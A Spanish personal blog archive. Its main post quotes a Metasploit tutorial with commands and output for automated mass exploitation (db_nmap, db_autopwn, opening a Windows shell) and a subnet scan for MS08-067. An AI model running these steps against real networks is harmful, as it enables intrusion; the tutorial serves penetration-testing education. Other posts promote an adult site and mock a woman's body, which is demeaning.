Archivo

Archive for the ‘Uncategorized’ Category

Que tias tan buenas

3 septiembre, 2013 Deja un comentario

Pues eso! que cantidad de tias Buenas

tumblr_lc6biz4RPk1qz7ltxo1_

Categorías: Uncategorized

Vaya pibones!

5 agosto, 2013 Deja un comentario

Pues nada, si os dais una vuelta por http://tetasnow.com sabreis de lo que hablo!

selfshots_10658

Categorías: Uncategorized

Auténtica siesta española.

15 marzo, 2013 Deja un comentario
Categorías: Uncategorized

Pastillas contra el miedo

2 agosto, 2010 1 comentario

¿Tienes miedo? Los investigadores están trabajando en un fármaco que conseguirá que seamos mas valientes.

Los estudios han demostrado que las personas en situaciones de estrés reaccionan con más calma si se producen menos cortisol, y más neuropéptido Y.

Después de localizar el área del cerebro que puede superar el miedo, el Dr.Yadin Dudai cree que el cerebro puede ser químicamente manipulado para ser más valiente. Cabe decir que el ejército está muy interesado en este concepto.

Nueva Temporada

30 julio, 2010 Deja un comentario

Por cuestiones personales he dejado de escribir entradas en el Blog.  pero ahora vengo con mas ganas, y con nuevas noticias y variedades. He intentado corregir un poco la cantidad de errores que ya existían en las entradas anteriores y en definitiva, espero poder seguir escribiendo algunas líneas en este Blog de todo aquello que me resulta interesante de la red.

Para celebrar una nueva época y nueva temporada lo celebraré con una canción de Moby.

Como no he encontrado ningún vídeo musical de buena calidad que poner aquí, solo pondré la versión que aparece en la banda sonora de Miami Vice

Categorías: Uncategorized

El cañon mas pequeño del mundo

11 May, 2010 Deja un comentario

Realmente no estoy seguro de que este sea el cañón mas pequeño del mundo, pero si es el cañón funcional mas pequeño que yo he visto nunca. Como podéis ver en el vídeo, dispara munición real, aunque no se le llame artillería pesada, mas bien, perdigón, parece que sea capaz de hacer bastante daño si se dispara contra alguna persona.

Categorías: Curiosidades, Uncategorized Etiquetas: ,

Curioso Captcha en Facebook

2 abril, 2010 Deja un comentario

Curioso CAPTCHA encontrado en Facebook

Categorías: Uncategorized

La metralleta de Metasploit

30 marzo, 2010 7 comentarios
Peleandome con Metasploit en su version Windows y en la version Linux ( Backtrack 4 ) para conseguir una shell en un windows Vista Home Premium service pack 1, me encuentro con la fabulosa pagina web de Pentester.es, donde nos cuentan como crear una base de datos en metasploit para lanzar «X» numero de exploits simultaneos a «X» Hosts simultaneos. Lo que la verdad ahorra mucho trabajo!

Llevo unas 16 horas peleandome con metasploit y la victima Windows Vista sin conseguir ningun resultado. No he conseguido shell, y no he conseguido overflow. Y aunque este windows vista pertenece a LAN donde las acciones deberian ser mas risueñas, no he conseguido nada de nada….

Asi que si alguien quiere darme algun consejo, puede hacerlo en los comentarios, a ver si asi consigo algo interesante y super mis fustraciones.

A continuacion la Entrada de Pentester.es
_______________
_________
Indudable es, que la Metasploit, se ha convertido en una de las herramientas imprescindibles para la auditoría lógica y test de penetración. En este post vamos a centrarnos en su función autopwn o como vulgarmente se le podría definir la “metralleta” de exploits.
Metasploit y función db_autopwn, hacen servir una base de datos (mysql, sqlite3 o postgres soportadas) para albergar el listado de hosts y servicios que queramos auditar de forma automática, permitiendo agilizar el proceso de explotación y penetración de forma sustancial. La manera de alimentar a base de datos con posibles victimas puede partir de nmap o del resultado de un .nbe de Nessus.
En primera instancia vamos a ver como habilitar la funcionalidad “db”, dado que por defecto si Metasploit no encuentra las librerias de Ruby asociadas a la base de datos que vamos a utilizar no será visible para el usuario esta funcionalidad extendida. Para comprobar si se tiene instaladas las dependencias necesarias tan solo tecleamos en la consola de Metasploit “help”, si su resultado es como el siguiente es posible (digo es posible porque a veces no se tiene completaente satisfechas las dependencias) utilizar las funciones extendidas “db”.

| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|

=[ msf v3.3-dev [core:3.3 api:1.0]
+ –=[ 412 exploits – 261 payloads
+ –=[ 21 encoders – 8 nops
=[ 191 aux

msf > help

Core Commands
=============

Command Description
——- ———–
? Help menu
back Move back from the current context

[…]
unsetg Unsets one or more global variables
use Selects a module by name
version Show the framework and console library version numbers

Database Backend Commands
=========================

Command Description
——- ———–
db_connect Connect to an existing database
db_create Create a brand new database
db_destroy Drop an existing database
db_disconnect Disconnect from the current database instance
db_driver Specify a database driver

En el caso de que no apareciera el menu “Database Backend Commands” y suponiendo que estamos en un entorno Debian procedeos a instalar los siguientes paquetes con sus dependencias:

aptitude install sqlite3 libsqlite3-ruby libdbd-sqlite3-ruby libopenssl-ruby nmap

Muy bien, una vez instalado lo anterior procedemos a seleccionar el entorno de base de datos que Metasploit manejará, para ello usaos el comando “db_driver”

msf > db_driver
[*] Active Driver: sqlite3
[*] Available: sqlite3, mysql

En este caso el driver utilizado es sqlite3, si quisiéramos usar mysql, por ejemplo, tecleariamos:

msf > db_driver mysql
[*] Using database driver mysql

A continuación lo que tenemos que hacer es crear la base de datos mediante el comando “db_create nombre”

msf > db_create pentester.es
[*] Creating a new database instance…
[*] Successfully connected to the database
[*] File: pentester.es

Este comando crea y nos conecta a la bd, en el caso de que quisiéramos utilizar una ya existente utilizariamos “db_connect nombre”

msf > db_connect pentester.es
[*] Successfully connected to the database
[*] File: pentester.es

Ahora nos queda “nutrir” a sqlite3 con los host y servicios que queremos auditar para ello nos apoyaremos en el comando “db_nmap”, que no hace otra cosa que llamar a nmap dentro del entorno de Metasploit. En este caso vamos a analizar al host 192.168.2.2.

msf > db_nmap -n -sT -PN 192.168.2.2

[*] exec: «/usr/bin/nmap» «-n» «-sT» «-PN» «192.168.2.2» «-oX» «/tmp/dbnmap20091018-3147-2qv7ko-0»
NMAP:
NMAP: Starting Nmap 4.62 ( http://nmap.org ) at 2009-10-18 22:50 CEST
NMAP: Interesting ports on 192.168.2.2:
NMAP: Not shown: 1709 closed ports
NMAP: PORT STATE SERVICE
NMAP: 53/tcp open domain
NMAP: 80/tcp open http
NMAP: 139/tcp open netbios-ssn
NMAP: 389/tcp open ldap
NMAP: 445/tcp open microsoft-ds
NMAP: 8080/tcp open http-proxy
NMAP:
NMAP: Nmap done: 1 IP address (1 host up) scanned in 2.232 seconds

En este momento Metasploit ha introducido el host 192.168.2.2 y todos sus servicios en la bd. Para comprobarlo podemos usar db_hosts (muestra la maquinas target) y db_services (servicios a auditar para cada maquina)

msf > db_hosts
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Host: 192.168.2.2 Status: alive OS:

msf > db_services
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=53 proto=tcp state=up name=domain
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=80 proto=tcp state=up name=http
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=139 proto=tcp state=up name=netbios-ssn
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=389 proto=tcp state=up name=ldap
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=445 proto=tcp state=up name=microsoft-ds
[*] Time: Sun Oct 18 22:50:33 +0200 2009 Service: host=192.168.2.2 port=8080 proto=tcp state=up name=http-proxy

Ya tenemos el objetivo seleccionado, ahora ya tan solo nos queda soltar la metralleta mediate “db_autopwn -t -e -p”. A continuación Metasploit seleccionará todos los exploits disponibles para los servicios almacenados en la bd y solo los que afecten a los puertos seleccionados.

> db_autopwn -t -p -e
[*] Analysis completed in 8.36183190345764 seconds (0 vulns / 0 refs)
[*] Matched exploit/unix/webapp/guestbook_ssi_exec against 192.168.2.2:80…
[*] (1/142): Launching exploit/unix/webapp/guestbook_ssi_exec against 192.168.2.2:80…
[*] Matched exploit/windows/http/savant_31_overflow against 192.168.2.2:80…
[*] (2/142): Launching exploit/w […]

Como vemos Metaesploit ha seleccionado 142 exploits que afectan a los servicios descubiertos, lanzando uno tras otro cual AK-47.
Pero ¿como podemos saber si un exploit lanzado ha tenido exito? Pues con el comando “sessions -l ” se muestran las shells que se han conseguido. Como se puede observar se han conseguido 1 acceso al sistema por 1 exploit que han tenido éxito.

msf > sessions -l
Active sessions
===============
Id Description Tunnel
– ———– ——
1 Command shell 192.168.2.3 -> 192.168.2.2

Para seleccionar una sesión en concreto

msf > sessions -i 1
[*] Starting interaction with 1…
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

Este tipo de aproximaciones son bastante arriesgadas dentro de un proceso de pentesting ya que si se ha acordado con el cliente que se producirán las menores DoS posibles este proceso podría tumbar varios servicios o máquinas. Pero si se dispone de libre actuación, la siguiente aproximación sería muy interesante para hacerse con numerosos hosts de la red.

msf > db_nmap -p 445,139 -PN -sS -n 192.168.2.0/24

En un entorno con una política de parcheo “amigable” para el auditor el numero de host Windows afectados por la MS08-067 nos daría muchas alegrias 😉

Saludos Pentesteros.

Categorías: Seguridad, Uncategorized Etiquetas: , ,

Disfraz de Calavera

10 marzo, 2010 Deja un comentario

Hay gente que no tiene vergüenza a la hora de disfrazarse. Esta chica por ejemplo, en vez de elegir este disfraz podría haberse disfrazado de Jabba el Hut.

Aquí os dejo un par de imágenes previas a la aparición en la calle de esta chica.

Y aquí os dejo el enlace a los responsables de todo esto. WEB

Tengo que decir, que esta historia me recuerda a una entrada de la pagina Pikatelas.com donde aparece un extraordinario documento gráfico en el que podemos ver a Jabba el Hut disfrazado de Princesa Leia

Categorías: Uncategorized Etiquetas: , ,

Robot Dalek controlado con un iPhone

2 marzo, 2010 1 comentario

No muchos sabréis que los Dalek (foto) son unos robots alienígenas que aparecen en la serie del Dr.Who, tanto en la nueva como en la antigua serie. el nivel de Frikismo necesario para saber estos datos de memoria es alto! 🙂 En este vídeo podemos ver como un friki ha programa un iPhone para utilizarlo como control remoto de uno de estos robots espaciales.

Categorías: Uncategorized